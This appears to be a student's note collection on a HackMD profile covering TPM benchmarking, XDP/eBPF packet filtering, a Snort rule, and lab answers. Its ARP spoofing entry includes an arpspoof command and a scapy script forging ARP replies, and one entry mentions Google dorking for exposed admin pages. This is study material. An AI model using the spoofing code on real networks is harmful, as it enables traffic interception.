Nemo

@nemoz

Joined on Nov 8, 2021

  • Eliminate the traditional distinction between external and internal networks. In other words, all traffic is untrusted, and internal security staff should inspect and log all traffic and enforce access control. The shift in attack patterns: in 2010 a plane flew from New York to Vienna carrying ten seemingly ordinary passengers who did not know one another — one of them had even tested software for Microsoft — but their real identities were Russian spies who had maintained perfectly unremarkable lives for years, working to get close to influential people in the United States and secretly sending the information they gathered back to Russia. This example shows how the modern attack cycle has stretched out: attackers have shifted to "low and slow" techniques, spending months or even years quietly collecting network data that we would not normally notice. And unlike the old broad sweeps for any exploitable target, modern attacks are increasingly narrow and targeted, especially against high-value systems or information. The Philip Cummings Problem: Philip Cummings worked at a company that supplied software to several credit bureaus; he collaborated with a Nigerian crime ring, passing customers' credit records to the group.
  • Hyper-V Using Windows' native Hyper-V virtualization platform, we can create virtual machines with a TPM module and Secure Boot support, and Windows 11 can be installed on them. Installation steps / Prerequisites: first enable the Hyper-V feature via Control Panel -> Programs -> Turn Windows features on or off -> check the Hyper-V option. Then download the Windows 11 ISO provided by the NTU Computer and Information Networking Center to prepare for the VM installation (note that you must be on the NTU network): https://download.cc.ntu.edu.tw/download.php, along with the KMS activation script.
  • Group Policy setting On Windows 10 and Windows 11, Group Policy settings can be used to configure how the system uses the TPM. Press Windows key + R and enter gpedit.msc to open the Group Policy editor, then navigate to Administrative Templates -> System -> Trusted Platform Module Services to configure the system's TPM policies. The level of TPM owner authorization information available to the operating system: this setting controls which TPM operations Windows is allowed to perform; the higher the level, the more operations are permitted. For example:
  • Task Specification In this note, I was trying to figure out several questions, including: Does my laptop (MacBook Air 2020) support TPM? And if so, is it TPM 2.0? What functions can be performed with my computer's TPM module? What algorithms does it use? Where does it store the key? What should be done when the user forgets the key? Can the TPM improve the performance of "data in motion"?
  • About The Speed of Cipher Algorithms Situation Specification We already know that we can use the engine from this GitHub project to shift the encryption and decryption work for SSL/TLS communication from the CPU to the TPM. Now we want to go a step further and measure the performance change after switching to the TPM. Task Specification The openssl project provides a useful command, openssl speed, to measure the performance of each algorithm it supports. I planned to use openssl speed to test the performance difference between the CPU and the TPM when performing these encryption and decryption algorithms. We can simply type: openssl speed [algorithms]
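A possible way to script the two runs side by side is sketched below. It simply shells out to openssl speed with and without the engine flag; the engine name "tpm2tss" and the choice of rsa2048 are assumptions about the tpm2-tss-engine setup, not values from the note.

```python
# Hypothetical wrapper: run `openssl speed` twice, once on the CPU and once
# through the TPM engine, and print both outputs for comparison.
# Engine name "tpm2tss" and algorithm "rsa2048" are assumptions.
import subprocess

def run_speed(extra_args):
    cmd = ["openssl", "speed"] + extra_args
    result = subprocess.run(cmd, capture_output=True, text=True)
    # progress lines go to stderr on some builds, so keep both streams
    return result.stdout + result.stderr

print("--- CPU ---")
print(run_speed(["rsa2048"]))

print("--- TPM (engine name assumed) ---")
print(run_speed(["-engine", "tpm2tss", "rsa2048"]))
```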
  • ECDSA

    | TPM | sign | verify | sign/s | verify/s |
    | --- | --- | --- | --- | --- |
    | 160 bits ecdsa (secp160r1) | 0.0602s | 0.0002s | 16.6 | 6173.8 |
    | 192 bits ecdsa (nistp192) | 0.0603s | 0.0002s | 16.6 | 5192.3 |
    | 224 bits ecdsa (nistp224) | 0.0361s | 0.0001s | 27.7 | 10142.3 |
    | 256 bits ecdsa (nistp256) | 0.0362s | 0.0001s | 27.6 | 17669.3 |
    | 384 bits ecdsa (nistp384) | 0.0723s | 0.0006s | 13.8 | 1633.6 |
    | 521 bits ecdsa (nistp521) | 0.0722s | 0.0004s | 13.9 | 2248.3 |
    | 163 bits ecdsa (nistk163) | 0.1085s | 0.1685s | 9.2 | 5.9 |
    | 233 bits ecdsa (nistk233) | 0.1083s | 0.1687s | 9.2 | 5.9 |
  • Problem Specification We have previously experimented with measuring the performance of three different packet-filter approaches: user-level filtering, kernel-level filtering, and driver-level filtering. But the latency was too high because all of those experiments were run in virtual machines. Today we'll retest them on my PC. The platform is Ubuntu 20.04 Desktop running on an AMD R5-3600 CPU (6 cores, 3.6 GHz). We'll first set up the structure below: libpcap for user-level filtering, iptables for kernel-level filtering, and xdp-filter for driver-level filtering. In user space, a Python program records timestamp_1, the time when the packet arrives in user space. There is also an XDP dump program loaded at the driver level that records timestamp_0, the time a packet reaches the NIC. So the total latency is timestamp_1 - timestamp_0. Let's start with a simple test. We can use:
  • A Python UDP server that binds to port 7000 and records the user-space arrival time (timestamp_1):

```python
import socket
import time

HOST = '0.0.0.0'
PORT = 7000

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind((HOST, PORT))
print('server start at: %s:%s' % (HOST, PORT))

while True:
    data, addr = s.recvfrom(2048)      # block until a UDP packet arrives
    timestamp_1 = time.time()          # user-space arrival time
    print('received %d bytes from %s at %f' % (len(data), addr, timestamp_1))
```
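To generate traffic for the server above, a matching sender can be as simple as the sketch below; the target address, payload size, and send interval are placeholders rather than the experiment's actual settings.

```python
# Hypothetical UDP sender for the latency test. Target IP, payload size and
# interval are placeholder values, not taken from the original note.
import socket
import time

TARGET = ('192.168.0.2', 7000)   # address of the machine running the server (assumption)

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
payload = b'x' * 64              # small fixed-size probe packet

for i in range(1000):
    s.sendto(payload, TARGET)
    time.sleep(0.001)            # roughly 1000 packets per second
```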
  • Q1 Q2 It did nothing. Q3 In order to execute the code below line 65, the name of the program itself must be "ocl.exe". Q4
  • Problem Specification I tried to use a project from GitHub a few days ago, but its code seems out of date and too old to use, so I decided to build a user-space filter program myself. To do so, I need to study libpcap and SO_ATTACH_BPF in depth so that the program can fulfill the central ideas of user-space filtering. The concept of user-space filtering is somewhat fuzzy. Its advantage is that the rules can be more complicated than those in XDP or kernel space, and they can vary from one application to another. But should a packet go through kernel space or not? Thanks to the libpcap project, we can pull the packet out of the kernel early and send it straight to user space; otherwise the whole process is slow, because the packet has to traverse the entire network-stack datapath and then be copied from kernel memory to user memory, which takes a lot of time. With the DPDK project, the packet is delivered straight to user space while it is still at the driver level, so it never enters the network stack at all, which saves time and avoids the memory copy. So which one, libpcap or DPDK, should be called the finest way to implement a user-space filter? I think maybe both. Task Specification I planned to build a BPF socket program first. With the SO_ATTACH_BPF socket option and libpcap, a socket can dynamically attach or detach a BPF or eBPF filter.
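Before moving to SO_ATTACH_BPF (which expects a compiled eBPF program), the same idea can be illustrated with the classic-BPF socket option SO_ATTACH_FILTER, which needs no compiler at all. This is a minimal sketch of the mechanism, not alfwrapper's actual code: the constant 26 for SO_ATTACH_FILTER and the hand-written instruction list are Linux-specific assumptions.

```python
# Attach a classic BPF program to a raw packet socket with SO_ATTACH_FILTER.
# Linux-only; run as root (CAP_NET_RAW).
import ctypes
import socket
import struct

SO_ATTACH_FILTER = 26            # Linux value of SO_ATTACH_FILTER (assumption)
ETH_P_ALL = 0x0003               # receive all protocols

# Classic BPF program: accept only IPv4 frames, drop everything else.
# Each instruction is (code, jt, jf, k), packed as struct sock_filter.
insns = [
    (0x28, 0, 0, 0x0000000c),    # ldh [12]              ; load the EtherType field
    (0x15, 0, 1, 0x00000800),    # jeq #0x800, jt=0, jf=1 ; is it IPv4?
    (0x06, 0, 0, 0x0000ffff),    # ret #65535            ; yes: accept the frame
    (0x06, 0, 0, 0x00000000),    # ret #0                ; no: drop it
]
filter_bytes = b''.join(struct.pack('HBBI', *i) for i in insns)
buf = ctypes.create_string_buffer(filter_bytes)                # must stay referenced
fprog = struct.pack('HL', len(insns), ctypes.addressof(buf))   # struct sock_fprog

sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ALL))
sock.setsockopt(socket.SOL_SOCKET, SO_ATTACH_FILTER, fprog)

while True:
    frame, meta = sock.recvfrom(65535)
    print('IPv4 frame, %d bytes on %s' % (len(frame), meta[0]))
```

For more realistic rules, the (code, jt, jf, k) tuples can be generated with tcpdump -dd <expression> instead of being written by hand.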
  • Q1 Unlike lab3, lab4's main does not simply call subroutines line by line; instead it loops and repeats. Q2 We can see that a for-loop structure has been added to the main function. Q3 Each time the for loop in main calls the parse function, it passes it a gradually increasing parameter i.
  • Name / Student ID B07901142 卓寧文 Google Hacking We can see that the inurl parameter lets us query against the page URLs stored in the search engine's database; for example, searching for admin interfaces shows which sites have not hidden their admin login pages. Shodan
  • Problem Specification This week I was planning to reproduce the results from a paper comparing packet-filtering performance. The paper focuses on three different levels of packet filtering: driver level (via XDP), kernel level (via iptables), and user-space level (via a GitHub project). I have already roughly analyzed the driver level and the kernel level, but have not yet started the user-space part. The picture above shows the level of each of the three filters. The method the paper uses to implement user-space filtering is to use systemd and libpcap to create a socket with filtering rules attached. This allows application developers to ship packet-filtering rules that can be deployed together with their application, which not only lets every application have its own packet rules but also simplifies the central policy. Task specification The GitHub project is AlexanderKurtz's alfwrapper, an application-level firewall. It consists of three parts: a systemd facility that spawns ready-to-use sockets for the daemon, a BPF virtual machine that decides whether a packet should pass, and the bcc project to compile a C program into BPF bytecode.
  • Q1 int v is located at rbp - 0x8. int n is located at rbp - 0x4. That is, at the start of each factorial call, n and v are not given initial values; each invocation simply carves out 4 bytes per int starting from rbp. The consequence of not initializing the local variables is that after the previous call's frame is popped, the next call's rbp lands in the same place, and when it declares its two int variables it uses the first 8 bytes, exactly the two slots the previous call just finished using. That is why the local variables behave as if they were global. Q2 gets: you cannot specify a buffer size; you can declare a char array and pass its pointer, but gets has no way to tell whether the input exceeds the array length, so it can write past the array and create a potential vulnerability. It appends a \0 after the last byte read. fgets
  • lab 1 snort rules: alert tcp any any -> any 22 ( msg:"SSH Brute Force Attempt"; flow:established,to_server; content:"SSH"; nocase; offset:0; depth:4; detection_filter:track by_src, count 2, seconds 1; sid:1000001; rev:1;) The rule first declares the action alert and matches traffic from any IP to port 22 on this machine, then checks whether the first four bytes of the payload match "SSH", and finally adds a detection_filter that fires when the attempt rate from one source exceeds the configured threshold; here it is set to alert when two or more matches arrive within one second.
  • tcpdump After the last attempt to test performance with a large volume of packets was blocked by equipment problems, this time I want to study the paper's other measurement approach: measuring latency. The more ideal way is to use timestamps; I did something similar before, but the results were rather limited (see https://hackmd.io/@nemoz/HJ4J3RNG5). Because the timestamp was applied when the packet left the sender, the measurement absorbed the sender's network stack and the condition and quality of the link, so this time I want to apply the timestamp the moment the receiver's NIC gets the packet, i.e., to change the data path that the latency covers from the one shown in the first figure to the one in the second. The first thing that came to mind was the bcc project (BPF Compiler Collection) that senior classmate 正仁 shared in class; mapping it onto the figure above, the lowest-level tool that can observe packets is tcpdump, which can read the packet data and timestamps the driver hands up to the kernel. But it turns out that once an XDP-type firewall is enabled, tcpdump no longer receives any packets, for the reason shown in the figure below:
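Setting tcpdump aside, the stamping itself could also be done with bcc directly at the XDP hook. The rough sketch below records, in a one-slot BPF array map, the kernel timestamp of the most recently seen frame while passing every packet on; the interface name and the single-slot map layout are illustrative assumptions, not the note's actual tooling.

```python
# Rough bcc sketch: timestamp packets at the XDP hook (driver level) and read
# the value from user space. Interface name is an assumption; run as root.
from bcc import BPF
import ctypes as ct
import time

prog = r"""
#include <uapi/linux/bpf.h>

BPF_ARRAY(last_seen, u64, 1);

int xdp_stamp(struct xdp_md *ctx) {
    u32 key = 0;
    u64 ts = bpf_ktime_get_ns();    // time the frame reached the XDP hook
    last_seen.update(&key, &ts);
    return XDP_PASS;                // never drop, just observe
}
"""

device = "eth0"                      # receiver NIC (assumption)
b = BPF(text=prog)
fn = b.load_func("xdp_stamp", BPF.XDP)
b.attach_xdp(device, fn, 0)

try:
    while True:
        ts = b["last_seen"][ct.c_int(0)].value
        print("last packet seen at %d ns (CLOCK_MONOTONIC)" % ts)
        time.sleep(1)
finally:
    b.remove_xdp(device, 0)
```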
  • Performance Implications of Packet Filtering https://www.net.in.tum.de/fileadmin/bibtex/publications/papers/ITC30-Packet-Filtering-eBPF-XDP.pdf Modern network architectures have some shortcomings around firewalling, mainly the following four: packets that should be filtered are filtered too late, causing unnecessary overhead and hidden risk; developers know best what filtering rules suit the packets destined for their own app and should be able to ship their filtering policy together with the app; even if the administrator knows every app's needs, they still have to cope with countless, ever-changing network configuration policies; and finally performance, which is related to all three points above. Most modern firewall techniques are implemented as modules hooked into the kernel, such as iptables and nftables, but by the time a packet is filtered out, unnecessary traffic has already incurred overhead such as memory copies. To solve these problems, two filtering techniques that differ from the past have been introduced: moving the filtering out of the kernel, either upward into user space, or downward by handing the packet-parsing work directly to an external FPGA-style NIC (see https://www.xilinx.com/publications/about/ANCS_final.pdf).
  • ARP Spoofing The Address Resolution Protocol maps IP addresses to physical (MAC) addresses: the querier broadcasts an ARP request asking who on the local network owns a given IP, the matching host sends back an ARP reply saying "I am this IP, and my MAC address is ...", and the querier records the mapping in its ARP table so that later packets to that IP no longer need a MAC lookup. ARP spoofing is when an attacker first uses NMAP to find a target (usually the gateway) and then sends forged ARP reply packets that trick the victim into believing the IP maps to the attacker's MAC, so every packet the victim sends to that IP goes to the attacker; the attacker then uses IP forwarding to relay the packets to the IP's real owner, eavesdropping on the conversation without either side noticing. $ arpspoof -i {NIC card} -t {victim IP} {Gateway IP} The -i flag specifies the network interface, -t specifies the machine to be deceived, followed by the gateway's IP. DHCP Spoofing
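For a concrete picture of the forged ARP reply itself, a minimal scapy sketch is shown below, meant for a lab network you control; scapy is assumed to be installed, and the interface and IP addresses are placeholders, not values from the note.

```python
# Minimal sketch of a single forged ARP reply ("gateway_ip is at my MAC"),
# using scapy. Interface and addresses are placeholders; run as root in a
# lab environment you own.
from scapy.all import ARP, Ether, get_if_hwaddr, sendp

iface      = "eth0"           # attacker's NIC (assumption)
victim_ip  = "192.168.1.10"   # placeholder
gateway_ip = "192.168.1.1"    # placeholder
my_mac     = get_if_hwaddr(iface)

# op=2 makes this an ARP reply; the victim caches gateway_ip -> my_mac.
reply = Ether(src=my_mac) / ARP(op=2, psrc=gateway_ip, hwsrc=my_mac, pdst=victim_ip)
sendp(reply, iface=iface, verbose=False)
```

A tool like arpspoof simply repeats this kind of reply at a steady interval so the victim's ARP cache never recovers.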
  • Project reading: ICMP DDoS Mitigation with eBPF XDP Background ICMP DDoS In the past, attacking a service was simple: send a flood of junk packets to its address to exhaust the target's computing resources and bandwidth. Firewalls soon gained mechanisms to block all packets from an address once a sudden flood of junk traffic from it was detected, which led to DDoS, distributed denial of service. Before attacking the main target, the attacker first compromises other poorly defended hosts, for example through social engineering, plants malicious files on them, and turns them into zombie machines. Coordinating the compromised zombies to flood the main target with ICMP at the same time defeats the defence described above, hence the name distributed denial of service. Besides ICMP floods, there are attacks that abuse the TCP three-way handshake: because the server waits for the final ACK during the handshake, a program that sends a large number of SYNs and never answers the server's SYN/ACK achieves the same effect. eBPF The (extended) Berkeley Packet Filter is a technique for running programs defined in user space inside kernel space. For stability and security, kernel functionality is hard to change drastically, since the kernel controls the entire system and any change has wide impact; with eBPF we can run user-space-defined programs in the kernel, and through eBPF maps events that happen in the kernel can also be observed by user-space applications. Concretely, a program written in C is compiled by BPF into bytecode, handed to the kernel to be verified and executed, and statistics are passed back to user space through maps for analysis and visualization. XDP Using eBPF, user-defined rules decide a packet's verdict early in the Linux kernel. To shorten the time from decision to action, XDP hooks into the NIC driver, so the verdict is reached before the packet is copied into the network stack's memory; that copy is very expensive and also gives attackers a window. Based on the analysis in kernel space, XDP can take several actions as defined by the eBPF program:
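To make the mechanism concrete, here is a small bcc-based sketch that drops ICMP at the XDP hook and counts the drops in a map readable from user space. The header includes mirror bcc's own XDP examples; the interface name is a placeholder, and this is an illustration of the idea in the paper, not the paper's implementation.

```python
# Sketch: drop ICMP at the XDP hook and expose a drop counter to user space
# through a BPF map. Interface name is a placeholder; run as root with bcc.
from bcc import BPF
import time

prog = r"""
#define KBUILD_MODNAME "icmp_drop"
#include <uapi/linux/bpf.h>
#include <linux/in.h>
#include <linux/if_ether.h>
#include <linux/ip.h>

BPF_ARRAY(drop_count, u64, 1);

int xdp_icmp_drop(struct xdp_md *ctx) {
    void *data     = (void *)(long)ctx->data;
    void *data_end = (void *)(long)ctx->data_end;

    struct ethhdr *eth = data;
    if ((void *)(eth + 1) > data_end)          // bounds check for the verifier
        return XDP_PASS;
    if (eth->h_proto != htons(ETH_P_IP))
        return XDP_PASS;

    struct iphdr *ip = (void *)(eth + 1);
    if ((void *)(ip + 1) > data_end)
        return XDP_PASS;

    if (ip->protocol == IPPROTO_ICMP) {
        u32 key = 0;
        u64 *cnt = drop_count.lookup(&key);
        if (cnt)
            __sync_fetch_and_add(cnt, 1);
        return XDP_DROP;                       // dropped before any memory copy
    }
    return XDP_PASS;
}
"""

device = "eth0"                                 # placeholder interface
b = BPF(text=prog)
fn = b.load_func("xdp_icmp_drop", BPF.XDP)
b.attach_xdp(device, fn, 0)

try:
    while True:
        for _, v in b["drop_count"].items():
            print("dropped ICMP packets: %d" % v.value)
        time.sleep(1)
finally:
    b.remove_xdp(device, 0)
```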
  • SDN (Software Defined Networking) Reference: Software-Defined Networks: A Systems Approach Landscape Market SDN is seen as a market shift: in the past, the computer industry mainly delivered specific solutions for specific customer purposes, a model called a vertical market. SDN's goal is to reshape the market into a horizontal ecosystem, letting hardware, OS, applications and so on be separated so they no longer depend on one another, which enriches the market and hands control of network equipment back to consumers, who can then adapt it to their own needs. Technical Splitting the different layers of a network device apart and opening and well-defining the interfaces between the units is called disaggregation. These layers include: